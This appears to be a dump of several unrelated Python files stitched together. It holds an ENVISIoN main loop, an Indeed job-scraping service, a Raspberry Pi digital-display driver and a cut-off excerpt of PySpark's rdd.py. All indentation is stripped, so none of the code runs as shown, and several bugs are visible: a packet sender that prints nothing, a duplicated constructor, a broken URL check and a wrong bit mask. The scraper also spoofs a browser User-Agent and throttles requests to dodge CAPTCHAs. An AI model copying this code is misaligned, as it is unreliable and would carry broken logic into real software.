# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##############################################################################################
import sys, os, inspect
import time
import select
import json
path_to_current_folder = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
sys.path.append(path_to_current_folder + "/../")
from envisionpy.EnvisionMain import EnvisionMain
from envisionpy.utils.exceptions import *
import threading
import queue
def send_packet(tag, data):
# Package data into JSON-string-packet and send it via printing.
packet = json.dumps({"tag": tag, "data": data})
#print(packet)
sys.stdout.flush()
def decode_packet(packet):
# Return python dictionary based on JSON-string-packet
obj = json.loads(packet)
return obj
def input_loop(input_queue):
while True:
input_queue.put(sys.stdin.readline())
def main():
input_queue = queue.Queue()
input_thread = threading.Thread(target=input_loop, args=(input_queue,))
input_thread.daemon = True
input_thread.start()
while True:
time_start = time.time()
while not input_queue.empty():
# send_packet("Debug", "Packet recieved")
packet = decode_packet(input_queue.get())
if packet['tag'] == 'request':
try:
response = envisionMain.handle_request(packet['data'])
send_packet('response', response)
except EnvisionError as e: # non critical error envision should still function.
send_packet('error', [packet['data'], format_error(e)])
# except Exception as e:
# send_packet('error', [packet['data'], format_error(e)])
elif packet['tag'] == 'ping':
send_packet('pong', packet['data'])
else:
print('Unhandled packet: ', packet)
envisionMain.update()
# Try to loop at 60 fps
time_elapsed = time.time() - time_start
time.sleep(max([1.0/60.0 - time_elapsed, 0]))
# Initialize ENVISIoN
send_packet("status", ["Initializing envision"])
envisionMain = EnvisionMain()
send_packet("status", ["envision started"])
# envisionMain.update()
# print(envisionMain.handle_request({'type': 'init_manager', 'data': ['C:/Kandidatprojekt/ENVISIoN-2020/nacl100.hdf5']}))
# envisionMain.update()
# print(envisionMain.handle_request({'type': 'start_visualisation', 'data': ['nacl100', 'charge']}))
# envisionMain.update()
# envisionMain.update()
# while True:
# time_start = time.time()
# envisionMain.update()
# # Try to loop at 60 fps
# time_elapsed = time.time() - time_start
# time.sleep(max([1.0/60.0 - time_elapsed, 0]))
main()
|
services.py
|
import requests
import copy
from .models import JobCardModel, JobMetricsModel, HttpHeadersModel, JobDataModel
from bs4 import BeautifulSoup
from threading import Thread
# Write your model services here.
class JobCardService:
''' Handles the retrieval and storage of JobCardModel objects. '''
# Global variables.
card_id = 0
max_results = 0
success_count = 0
failure_count = 0
cards = []
http_headers = HttpHeadersModel.headers
user_agents = HttpHeadersModel.user_agents
user_agents_count = len(user_agents) - 1
url: str
def __init__(self):
''' Default constructor. '''
self.url = ''
def __init__(self, position: str, *args):
''' Default constructor, with a job position specified. '''
pos = position.replace(' ', '+')
if len(args) == 0:
self.url = self.get_url(pos)
else:
location = args[0].replace(' ', '+')
self.url = self.get_url(pos, location)
def parse_page_results(self) -> None:
''' Makes a GET request to Indeed based on defined url, parses results page. '''
headers = copy.deepcopy(self.http_headers)
headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36' #self.user_agents[random.randint(0, self.user_agents_count)]
response = requests.get(self.url, headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
if soup is None:
print(f'Error: GET request to Indeed using {response.url} returned status code {response.status_code}.')
return
raw_cards = soup.select('a.tapItem.fs-unmask.result')
if raw_cards is None:
print(f'Error: raw_cards is none.\nCheck the url: {response.url}')
return
# Perform field extraction for an entire collection of 'raw cards'.
print(f'Parsing results 1 - 15: url = {response.url}')
parsed_cards = self.parse_card_details(cards = [self.get_card(raw_card) for raw_card in raw_cards])
self.cards.extend(parsed_cards)
# Iterate through the pagination to collect all cards from the search query.
for count in range(15, self.max_results, 15):
try:
url = 'https://www.indeed.com' + soup.find('a', {'aria-label': 'Next'}).get('href')
print(f'Parsing results {count + 1} - {count + 15}: url = {url}')
response = requests.get(url, headers=headers)
soup = BeautifulSoup(response.text, 'html.parser') if response.status_code == 200 else None
if soup is None:
return f'Error: GET request to Indeed using {url} returned status code {response.status_code}.'
raw_cards = soup.select('a.tapItem.fs-unmask.result')
if raw_cards is None:
return f'Error: raw_cards is none.\nCheck the url: {response.url}'
parsed_cards = self.parse_card_details(cards = [self.get_card(raw_card) for raw_card in raw_cards])
self.cards.extend(parsed_cards)
except AttributeError:
print('There is an attribute error!!')
continue
'''
# Multithreaded approach of retrieving all cards.
thread_url_template = self.url + '&start={}'
result_count = 10
for count in range(15, self.max_results, 15):
url = thread_url_template.format(result_count)
print(f'Attempting to GET results {count + 1} - {count + 15}. url = {url}')
thread = Thread(target=self.get_raw_cards, args=(url,))
thread.start()
thread.join() # Removed concurrent execution to reduce CAPTCHA likelihood because this is too fast for Indeed.
result_count += 10
'''
def get_raw_cards(self, url: str) -> None:
'''
This method will make a thread-safe GET request to Indeed.
The thread executing this function will append the found cards into self.cards.
'''
response = requests.get(url, headers=self.http_headers)
soup = BeautifulSoup(response.text, 'html.parser')
if soup is None:
return f'Error: GET request to Indeed using {response.url} returned status code {response.status_code}.'
raw_cards = soup.select('a.tapItem.fs-unmask.result')
if raw_cards is None:
return f'Error: raw_cards is none.\nCheck the url: {response.url}'
self.cards.extend([self.get_card(raw_card) for raw_card in raw_cards])
def get_card(self, raw_card) -> JobCardModel:
'''
Takes an individual 'raw_card' and returns a processed 'card' object
with a card id, job title, company name, company rating, company location, and job link.
'''
card_content = raw_card.find('td')
company_content = card_content.find('div', class_='companyInfo')
self.card_id += 1
try:
# Job Link (href)
url = 'https://www.indeed.com' + raw_card.get('href')
# Job Title
title = card_content.find('span', title=True).get_text()
# Company Name
company = company_content.find('span', 'companyName').get_text()
# Company Rating
raw_rating = company_content.find('span', 'ratingNumber')
rating = raw_rating.get_text() if raw_rating else 'None'
# Company Location
raw_location = company_content.find('div', 'companyLocation')
location = raw_location.get_text() if raw_location else 'None Found'
# Posting Date
date = raw_card.find('span', 'date').get_text()
return JobCardModel(self.card_id, title, company, rating, location, date, url)
except AttributeError:
print(f'Missing field in card {self.card_id}.')
return
def get_url(self, position, *args) -> str:
''' Builds and returns query url based on position (what) and location (where). '''
if len(args) == 0:
template_url = 'https://www.indeed.com/jobs?q={}&l'
return template_url.format(position)
else:
template_url = 'https://www.indeed.com/jobs?q={}&l={}'
return template_url.format(position, args[0])
def parse_card_details(self, cards):
''' Parses through all individual job posts, updates the metrics data, and returns parsed cards. '''
count = 0
for card in cards:
if card:
count += 1
card.details.programming_languages = copy.deepcopy(JobMetricsModel.pl)
card.details.frameworks = copy.deepcopy(JobMetricsModel.f)
thread = Thread(target=self.update_card_metrics, args=(card,))
thread.start()
thread.join()
else:
print(f'Card is None. card.url = {card}')
for card in cards:
if card.details.thread_suceeded:
self.success_count += 1
else:
self.failure_count += 1
return cards
def update_card_metrics(self, card: JobCardModel) -> None:
''' Makes a GET request to an individual job post and updates the associated cards' metrics. '''
if card is None:
print(f'Card is {card}. Cannot attempt to update_card_metrics.')
return
if card.url is None or '':
print(f'Thread {card.card_id} failed: Could not make GET request to the specified url. Url = {card.url}')
return
# Make GET request and retrieve raw_text.
response = requests.get(card.url, headers=self.http_headers)
soup = BeautifulSoup(response.text, 'html.parser')
if soup is None:
print(f'Error: GET request to Indeed using {self.url} returned status code {response.status_code}.')
return
# Find the job description's (raw) text.
raw_text = soup.find('div', attrs={'id': 'jobDescriptionText'})
if raw_text is not None:
split_text = raw_text.get_text(separator=' ').lower().replace('/', ' ').replace(',', ' ').replace('-', ' ').split()
else:
print(f'Thread {card.card_id} failed: raw_text is None.\nDetails: response_link = {response.url}')
return
# Clean (again) the job text into list of individual words (word vector).
translation_table = dict.fromkeys(map(ord, ".:;?|=~!@'(){}[]"), None) # List of chars to remove.
clean_words = [word.translate(translation_table).strip() for word in split_text]
# Iterate through each word in the job description.
for word in clean_words:
flagged = False
# Iterate through each programming language in self.programming_languages.
for pl in card.details.programming_languages:
if type(pl[0]) == list:
# Iterate through all pneumonics of this programming language and check if any matches with the word.
for p in pl[0]:
if p == word:
pl[1] = True
flagged = True
break
else:
continue
else:
# Check if the word is a programming language.
if pl[0] == word:
pl[1] = True
flagged = True
# If this word turned out to be a programming language, break from checking other
# programming languages and flag to self.frameworks that they need not be checked either.
if flagged:
break
else:
continue
# If the word was a programming language, continue to the next word.
if flagged:
continue
# Else, proceed with checking if word is a framework using same thread as above.
for framework in card.details.frameworks:
if type(framework[0]) == list:
for f in framework[0]:
if f == word:
framework[1] = True
flagged = True
break
else:
continue
else:
if framework[0] == word:
framework[1] = True
flagged = True
if flagged:
break
else:
continue
card.details.thread_suceeded = True
class JobDataService:
''' This class serves as a data analysis engine for a list of JobDetailsModel. '''
cards = []
pl_counts = copy.deepcopy(JobDataModel.pl)
f_counts = copy.deepcopy(JobDataModel.f)
def __init__(self, cards) -> None:
''' Default constructor with cards object.'''
self.cards = []
for card in cards:
self.cards += card
def reset_counts(self):
''' Reset count of the counts. '''
for pl in self.pl_counts:
pl[1] = 0
for f in self.f_counts:
f[1] = 0
def get_counts(self):
''' Parses through cards and sets the count of every pl. '''
if not any(self.cards):
print('Cards is empty. Returning None for now.')
return
for card in self.cards:
index = 0
for pl in card.details.programming_languages:
if pl[1]:
self.pl_counts[index][1] += 1
index += 1
index = 0
for f in card.details.frameworks:
if f[1]:
self.f_counts[index][1] += 1
index += 1
def filter_counts(self):
''' Sorts the counts lists in descending order and returns the top 10 items. '''
self.pl_counts = sorted(self.pl_counts, key=lambda pl: pl[1], reverse=True)[:10]
self.f_counts = sorted(self.f_counts, key=lambda f: f[1], reverse=True)[:10]
|
digital_display.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015 NXEZ.COM.
# http://www.nxez.com
#
# Licensed under the GNU General Public License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.gnu.org/licenses/gpl-2.0.html
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import RPi.GPIO as GPIO
import time
import re
from threading import Thread
class DigitalDisplay(object):
'''
Digital display class
'''
__pins = {'seg':[], 'sel':[]}
__real_true = GPIO.HIGH
__numbers = []
__is_flushing = False
__number_code = [0x3f, 0x06, 0x5b, 0x4f, 0x66, 0x6d, 0x7d, 0x07, 0x7f, 0x6f, 0x00, 0x40]
def __init__(self, pins, real_true = GPIO.HIGH):
'''
Init the digital display
:param pin: pin numbers in array
:param real_true: GPIO.HIGH or GPIO.LOW
:return: void
'''
self.__pins = pins
self.__real_true = real_true
try:
t1 = Thread(target = self.flush_4bit)
t1.setDaemon(True)
t1.start()
except:
print("Error: Unable to start thread by DigitalDisplay")
#Stauts.
@property
def numbers(self):
'''
Get the current numbers array showing
:return: numbers array
'''
return self.__numbers
#@numbers.setter
def set_numbers(self, value):
'''
Set the numbers array to show
:return: void
'''
pattern = re.compile(r'[-|#|\d]\.?')
matches = pattern.findall(value)
#del self.__numbers
self.__numbers = []
for i in range(len(matches)):
self.__numbers.append(matches[i])
#print(self.__numbers)
#@numbers.deleter
#def numbers(self):
# del self.__numbers
#Verbs.
def on(self):
'''
Set display on
:return: void
'''
self.__is_flushing = True
def off(self):
'''
Set display off
:return: void
'''
self.__is_flushing = False
for p in self.__pins['sel'] + self.__pins['seg']:
GPIO.output(p, not self.__real_true)
def show(self, str):
'''
Set the numbers array to show and enable the display
:return: void
'''
self.__is_flushing = False
self.set_numbers(str)
self.__is_flushing = True
#print(self.__numbers)
def flush_bit(self, sel, num, dp):
if num == '#':
num = 10
elif num == '-':
num = 11
else:
num = int(num)
GPIO.output(self.__pins['sel'][sel], self.__real_true)
n = self.__number_code[num]
if dp:
n = n | 10000000
for i in range(8):
if (n & (1 << i)):
GPIO.output(self.__pins['seg'][i], self.__real_true)
GPIO.output(self.__pins['sel'][sel], not self.__real_true)
for i in self.__pins['seg']:
GPIO.output(i, not self.__real_true)
def flush_4bit(self):
while True:
if self.__is_flushing:
#print(self.__numbers)
#print(range(min(4, len(self.__numbers))))
try:
for i in range(min(4, len(self.__numbers))):
self.flush_bit(i, self.__numbers[i].replace('.',''), True if self.__numbers[i].count('.') > 0 else False)
time.sleep(0.001)
except:
pass
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
from collections import defaultdict
from itertools import chain, ifilter, imap
import operator
import os
import sys
import shlex
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
import warnings
import heapq
import bisect
import random
from math import sqrt, log, isinf, isnan, pow, ceil
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, \
get_used_memory, ExternalSorter
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
# TODO: for Python 3.3+, PYTHONHASHSEED should be reset to disable randomized
# hash for string
def portable_hash(x):
"""
This function returns consistant hash code for builtin types, especially
for None and tuple with None.
The algrithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxint
h ^= len(x)
if h == -1:
h = -2
return h
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1] not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self._partitionFunc = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY_SER):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY_SER}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return imap(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(imap(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return ifilter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda (x, _): x)
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
>>> rdd = sc.parallelize(range(100), 4)
>>> rdd.sample(False, 0.1, 81).count()
10
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(5), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> rdd1.collect()
[1, 3]
>>> rdd2.collect()
[0, 2, 4]
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxint - int(numStDev * sqrt(sys.maxint))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxint)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
return rdd
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
return RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda (k, vs): all(vs)) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower() == "true")
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda (k, v): keyfunc(k), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower() == 'true')
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda (k, v): keyfunc(k), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda (k, v): k).collect()
samples = sorted(samples, reverse=(not ascending), key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[len(samples) * (i + 1) / numPartitions]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
